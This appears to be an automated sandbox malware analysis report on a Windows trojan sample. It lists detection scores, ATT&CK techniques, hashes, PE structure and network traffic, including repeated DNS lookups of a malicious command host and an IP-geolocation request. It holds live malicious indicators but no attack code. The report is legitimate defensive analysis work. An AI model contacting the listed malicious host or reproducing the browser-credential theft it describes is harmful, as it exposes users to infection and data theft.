ID: 508206
Sample Name: 7PPXbfDkRN
Cookbook: default.jbs
Time: 09:45:12
Date: 24/10/2021
Version: 33.0.0 White Diamond
Table of Contents
Windows Analysis Report 7PPXbfDkRN
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
  Yara Overview
  Sigma Overview
  Jbx Signature Overview
    AV Detection:
    Networking:
    Stealing of Sensitive Information:
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    Contacted IPs
      Public
      Private
  General Information
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASN
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
  Static File Info
    General
    File Icon
    Static PE Info
      General
      Entrypoint Preview
      Data Directories
      Sections
      Resources
      Imports
      Possible Origin
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Code Manipulations
  Statistics
  System Behavior
    Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124
      General
      File Activities
        File Read
      Registry Activities
        Key Created
        Key Value Created
  Disassembly
    Code Analysis
Windows Analysis Report 7PPXbfDkRN
Overview
General Information
Sample Name: 7PPXbfDkRN (renamed file extension from none to exe)
Analysis ID: 508206
MD5: 1614d9adfb1903a…
SHA1: cfa0028bb78e1b0…
SHA256: 42de2be8dd54f07…
Tags: exe trojan
Detection
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for subm…
Multi AV Scanner detection for doma…
Tries to harvest and steal browser in…
May check the online IP address of …
Uses a known web browser user age…
May sleep (evasive loops) to hinder …
PE file contains sections with non-s…
Internet Provider seen in connection…
Sample execution stops while proce…
IP address seen in connection with o…
Contains long sleeps (>= 3 min)
Classification
[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]
Process Tree
System is w10x64
7PPXbfDkRN.exe (PID: 5172 cmdline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe' MD5: 1614D9ADFB1903A189E6EFD9B6DC4077)
cleanup
Malware Configuration
No configs have been found
Yara Overview
No yara matches
Sigma Overview
No Sigma rule has matched
Jbx Signature Overview
AV Detection:
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Networking:
May check the online IP address of the machine
Stealing of Sensitive Information:
Tries to harvest and steal browser information (history, passwords, etc)
Mitre Att&ck Matrix
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter 2; Scheduled Task/Job; At (Linux); At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion 2 1; Rootkit; Obfuscated Files or Information; Binary Padding; Software Packing
Credential Access: OS Credential Dumping 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery 1; Virtualization/Sandbox Evasion 2 1; System Information Discovery 1; Remote System Discovery 1; System Network Configuration Discovery 1
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol 3; Application Layer Protocol 1 3; Ingress Tool Transfer 1; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Behavior Graph
ID: 508206
Sample: 7PPXbfDkRN
Startdate: 24/10/2021
Architecture: WINDOWS
Score: 64
[Behavior graph: process 7PPXbfDkRN.exe (started). Network nodes: staticimg.youtuuee.com (45.136.151.102, 49740, 49747, 49751; ENZUINC-US; Latvia); ip-api.com (208.95.112.1, 49735, 80; TUT-ASUS; United States); 192.168.2.1 (unknown). Signatures shown: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; May check the online IP address of the machine; Tries to harvest and steal browser information (history, passwords, etc)]
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source Detection Scanner Label Link
7PPXbfDkRN.exe 36% Virustotal Browse
7PPXbfDkRN.exe 37% Metadefender Browse
7PPXbfDkRN.exe 79% ReversingLabs Win64.Trojan.Fabookie
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
Source Detection Scanner Label Link
staticimg.youtuuee.com 10% Virustotal Browse
URLs
Source Detection Scanner Label Link
Domains and IPs
Contacted Domains
Name IP Active Malicious Antivirus Detection Reputation
ip-api.com 208.95.112.1 true false high
staticimg.youtuuee.com 45.136.151.102 true true 10%, Virustotal, Browse unknown
Contacted URLs
Name Malicious Antivirus Detection Reputation
URLs from Memory and Binaries
Contacted IPs
Public
IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1 ip-api.com United States 53334 TUT-ASUS false
45.136.151.102 staticimg.youtuuee.com Latvia 18978 ENZUINC-US true
General Information
Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 508206
Start date: 24.10.2021
Start time: 09:45:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 7PPXbfDkRN (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.troj.spyw.winEXE@1/0@146/3
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments: Adjust boot time; Enable AMSI
Private
IP
192.168.2.1
Simulations
Behavior and APIs
Time Type Description
09:46:11 API Interceptor 403x Sleep call for process: 7PPXbfDkRN.exe modified
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context
Comprobante de pago.doc Get hash malicious Browse ip-api.com/json/
Pv9HB349oG.exe Get hash malicious Browse ip-api.com/json
PozfYoUNtW.exe Get hash malicious Browse ip-api.com/json
DiscordSniper.exe Get hash malicious Browse ip-api.com//json/102.129.143.33
Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse ip-api.com//json/102.129.143.33
HazardNuker.exe Get hash malicious Browse ip-api.com/line/?fields=hosting
2wY8F2BCNp.exe Get hash malicious Browse ip-api.com/json
7WVpng6phO.exe Get hash malicious Browse ip-api.com/json/
Comprobante de pago (OCT).xls Get hash malicious Browse ip-api.com/json/
tywt33OZI0.exe Get hash malicious Browse ip-api.com/json
7mqSo6rtA0.exe Get hash malicious Browse ip-api.com/json
nIXnNtZvtI.exe Get hash malicious Browse ip-api.com/json/
nKnpb3gEQR.exe Get hash malicious Browse ip-api.com/json/
Xg4Pb7Cx99.exe Get hash malicious Browse ip-api.com/json
z7PRVhbVyw.exe Get hash malicious Browse ip-api.com/json
nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/
nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/
Pago_Monex_usd.xls Get hash malicious Browse ip-api.com/json/
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
ip-api.com Comprobante de pago.xls Get hash malicious Browse 208.95.112.1
Comprobante de pago.doc Get hash malicious Browse 208.95.112.1
Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1
PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1
DiscordSniper.exe Get hash malicious Browse 208.95.112.1
Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1
HazardNuker.exe Get hash malicious Browse 208.95.112.1
2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1
7WVpng6phO.exe Get hash malicious Browse 208.95.112.1
Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1
tywt33OZI0.exe Get hash malicious Browse 208.95.112.1
7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1
nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1
nKnpb3gEQR.exe Get hash malicious Browse 208.95.112.1
Xg4Pb7Cx99.exe Get hash malicious Browse 208.95.112.1
z7PRVhbVyw.exe Get hash malicious Browse 208.95.112.1
nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1
nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1
Pago_Monex_usd.xls Get hash malicious Browse 208.95.112.1
W82FHNSBQu.exe Get hash malicious Browse 208.95.112.1
staticimg.youtuuee.com nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102
4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exe
Get hash malicious Browse 45.136.151.102
tgmA1R5JHH.exe Get hash malicious Browse 45.136.151.102
Domains
ASN
JA3 Fingerprints
Static File Info
General
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.464543276535742
TrID:
  Win64 Executable GUI (202006/5) 92.65%
  Win64 Executable (generic) (12005/4) 5.51%
  Generic Win/DOS Executable (2004/3) 0.92%
  DOS Executable Generic (2002/1) 0.92%
  Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 7PPXbfDkRN.exe
File size: 1413632
MD5: 1614d9adfb1903a189e6efd9b6dc4077
SHA1: cfa0028bb78e1b0f51d4d389947319dd7beb10d5
SHA256: 42de2be8dd54f0733138e13af44653c7acf129ab0acc376d89a18b2b8a69101e
SHA512: d3000fa418a539e5f67bed3cfe4b754796eb18ee71e3e11635f0f9dc23fe4a0d25c173524c4e820958c0f3c5103f1db242737a5a8543c247fc2fa1913b251a2b
SSDEEP: 24576:P/mj8gr6siw8y8KbE0N4TMAeulQI1N6y83bMJb2dtGulJe:POjH7iby84E0aTrlQcNkbYidv
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....h...h...h...l...h...k...h...m...h...m.".h...k...h.W.l...h.W.k...h.W.m._.h...i...h...i...h...a...h.......h...j...h.Rich..h
File Icon
Icon Hash: 00828e8e8686b000
No context
No context
No created / dropped files found
General
Entrypoint: 0x1400b2e74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA
Time Stamp: 0x616F6E55 [Wed Oct 20 01:18:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Dropped Files
Created / dropped Files
Static PE Info
Network Port Distribution
Import Hash: a760781485268ad462242975d68411d5
General
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0x104e40 0x105000 False 0.528789885656 data 6.4831074188 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata 0x106000 0x39d10 0x39e00 False 0.387811318844 data 5.30917318484 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data 0x140000 0xee44 0xba00 False 0.255565356183 DOS executable (block device driver) 4.63509517254 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata 0x14f000 0xbc10 0xbe00 False 0.473725328947 data 6.06247808176 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA 0x15b000 0xf4 0x200 False 0.322265625 data 2.47542112189 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x15c000 0x238 0x400 False 0.3310546875 data 4.8804957568 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc 0x15d000 0x20ec 0x2200 False 0.291590073529 data 5.40005907283 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Language of compilation system: English
Country where language is spoken: United States
Network Behavior
Entrypoint Preview
Data Directories
Sections
Resources
Imports
Possible Origin
TCP Packets
UDP Packets
DNS Queries
DNS Answers
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.252378941 CEST
8.8.8.8 192.168.2.5 0xded4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.897815943 CEST
8.8.8.8 192.168.2.5 0xc7b8 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:06.542243958 CEST
8.8.8.8 192.168.2.5 0xe70a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.151657104 CEST
8.8.8.8 192.168.2.5 0xa97e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.784101963 CEST
8.8.8.8 192.168.2.5 0xe8de No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:08.405812979 CEST
8.8.8.8 192.168.2.5 0x8d83 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.020821095 CEST
8.8.8.8 192.168.2.5 0x30ae No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.643799067 CEST
8.8.8.8 192.168.2.5 0x4a01 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.266096115 CEST
8.8.8.8 192.168.2.5 0x6280 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.980098009 CEST
8.8.8.8 192.168.2.5 0xdb87 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:11.975509882 CEST
8.8.8.8 192.168.2.5 0x197e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.248315096 CEST
8.8.8.8 192.168.2.5 0x31c7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.916690111 CEST
8.8.8.8 192.168.2.5 0x22e5 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:14.525177002 CEST
8.8.8.8 192.168.2.5 0x9cba No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.129575014 CEST
8.8.8.8 192.168.2.5 0xac31 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.741206884 CEST
8.8.8.8 192.168.2.5 0xc91 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.380837917 CEST
8.8.8.8 192.168.2.5 0xbb6 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.999514103 CEST
8.8.8.8 192.168.2.5 0xd77c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:17.613404989 CEST
8.8.8.8 192.168.2.5 0x6291 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:18.568649054 CEST
8.8.8.8 192.168.2.5 0x852f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:19.185070038 CEST
8.8.8.8 192.168.2.5 0x57a2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:19.797535896 CEST
8.8.8.8 192.168.2.5 0xc556 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 21 of 58
Oct 24, 2021 09:47:20.399183989 CEST
8.8.8.8 192.168.2.5 0x46f3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:21.013571978 CEST
8.8.8.8 192.168.2.5 0xf185 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:21.621269941 CEST
8.8.8.8 192.168.2.5 0x1604 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.251352072 CEST
8.8.8.8 192.168.2.5 0x94b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.899736881 CEST
8.8.8.8 192.168.2.5 0x47d3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:23.521917105 CEST
8.8.8.8 192.168.2.5 0xf03d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.131295919 CEST
8.8.8.8 192.168.2.5 0xc178 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.780937910 CEST
8.8.8.8 192.168.2.5 0x3452 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:25.413681030 CEST
8.8.8.8 192.168.2.5 0xcb54 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.027328968 CEST
8.8.8.8 192.168.2.5 0xcbc1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.631810904 CEST
8.8.8.8 192.168.2.5 0xcd1c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.253463030 CEST
8.8.8.8 192.168.2.5 0xbda2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.865590096 CEST
8.8.8.8 192.168.2.5 0xc3e3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:28.457813978 CEST
8.8.8.8 192.168.2.5 0xd6db No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.146256924 CEST
8.8.8.8 192.168.2.5 0x54b1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.783416033 CEST
8.8.8.8 192.168.2.5 0x7045 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:30.829247952 CEST
8.8.8.8 192.168.2.5 0x38d8 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.173935890 CEST
8.8.8.8 192.168.2.5 0xc19c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.807846069 CEST
8.8.8.8 192.168.2.5 0xa789 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:33.433953047 CEST
8.8.8.8 192.168.2.5 0xd6e6 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.074692965 CEST
8.8.8.8 192.168.2.5 0x829b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.699784040 CEST
8.8.8.8 192.168.2.5 0x7737 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.329610109 CEST
8.8.8.8 192.168.2.5 0xa830 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.929393053 CEST
8.8.8.8 192.168.2.5 0x9192 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:36.531472921 CEST
8.8.8.8 192.168.2.5 0x8a43 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:37.161864996 CEST
8.8.8.8 192.168.2.5 0x9f3b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 22 of 58
Oct 24, 2021 09:47:37.784832954 CEST
8.8.8.8 192.168.2.5 0xa3aa No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:38.405206919 CEST
8.8.8.8 192.168.2.5 0x84a2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:39.014890909 CEST
8.8.8.8 192.168.2.5 0x4745 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:39.629781961 CEST
8.8.8.8 192.168.2.5 0xed77 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.251389027 CEST
8.8.8.8 192.168.2.5 0x1158 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.867505074 CEST
8.8.8.8 192.168.2.5 0x44a0 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:41.505384922 CEST
8.8.8.8 192.168.2.5 0x96c0 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.125135899 CEST
8.8.8.8 192.168.2.5 0x5c7b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.746428013 CEST
8.8.8.8 192.168.2.5 0x461b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:43.370395899 CEST
8.8.8.8 192.168.2.5 0x9a08 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:43.990777969 CEST
8.8.8.8 192.168.2.5 0xcad7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:44.929102898 CEST
8.8.8.8 192.168.2.5 0xa550 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:45.547961950 CEST
8.8.8.8 192.168.2.5 0x5f42 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.162534952 CEST
8.8.8.8 192.168.2.5 0xbac4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.789660931 CEST
8.8.8.8 192.168.2.5 0x3771 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:47.404970884 CEST
8.8.8.8 192.168.2.5 0x7f47 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:48.012718916 CEST
8.8.8.8 192.168.2.5 0xf56e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:48.618808985 CEST
8.8.8.8 192.168.2.5 0x360d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.225338936 CEST
8.8.8.8 192.168.2.5 0x911c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.817647934 CEST
8.8.8.8 192.168.2.5 0xfd3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:50.428714991 CEST
8.8.8.8 192.168.2.5 0xe416 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.059173107 CEST
8.8.8.8 192.168.2.5 0xecad No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.661578894 CEST
8.8.8.8 192.168.2.5 0x5b5 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.275777102 CEST
8.8.8.8 192.168.2.5 0x36f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.893830061 CEST
8.8.8.8 192.168.2.5 0x68de No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:53.489969015 CEST
8.8.8.8 192.168.2.5 0xf293 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 23 of 58
Oct 24, 2021 09:47:54.106935024 CEST
8.8.8.8 192.168.2.5 0x69a3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:54.737811089 CEST
8.8.8.8 192.168.2.5 0x4eac No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.344943047 CEST
8.8.8.8 192.168.2.5 0xe83f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.972354889 CEST
8.8.8.8 192.168.2.5 0xcc66 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:56.577006102 CEST
8.8.8.8 192.168.2.5 0xb24f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.207375050 CEST
8.8.8.8 192.168.2.5 0xff No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.836489916 CEST
8.8.8.8 192.168.2.5 0xdca No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:58.454911947 CEST
8.8.8.8 192.168.2.5 0xcdaa No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:59.077966928 CEST
8.8.8.8 192.168.2.5 0x6f1c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:59.675107002 CEST
8.8.8.8 192.168.2.5 0xcd41 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.280102015 CEST
8.8.8.8 192.168.2.5 0x7608 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.895539045 CEST
8.8.8.8 192.168.2.5 0x825b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:01.503696918 CEST
8.8.8.8 192.168.2.5 0xcc3a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:02.130254984 CEST
8.8.8.8 192.168.2.5 0x95a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
HTTP Request Dependency Graph
ip-api.com
staticimg.youtuuee.com
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.5 49735 208.95.112.1 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:12.018076897 CEST 649 OUT
GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
